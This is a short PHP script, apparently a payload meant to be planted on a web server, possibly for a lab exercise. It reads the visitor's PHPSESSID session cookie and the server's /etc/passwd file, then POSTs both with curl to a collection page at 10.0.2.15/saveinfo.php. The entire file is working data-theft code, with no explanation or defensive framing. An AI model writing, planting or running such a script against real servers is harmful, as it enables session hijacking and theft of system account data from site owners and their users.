<?php
	$cookie = $_COOKIE['PHPSESSID'];
	$passwds = file_get_contents('/etc/passwd');

   	$url = 'http://10.0.2.15/saveinfo.php';
   	
	$myvars = 'passwds=' . $passwds . '&cookie=' . $cookie;
    
   	$conn = curl_init( $url );
   	curl_setopt($conn, CURLOPT_CONNECTTIMEOUT, 5);
	curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1);
   	curl_setopt($conn, CURLOPT_POST, 1);
   	curl_setopt($conn, CURLOPT_POSTFIELDS, $myvars);	
   	curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1);
   	curl_setopt($conn, CURLOPT_HEADER, 0);
    
   	$response = curl_exec($conn);
   	curl_close($conn);
	

?>
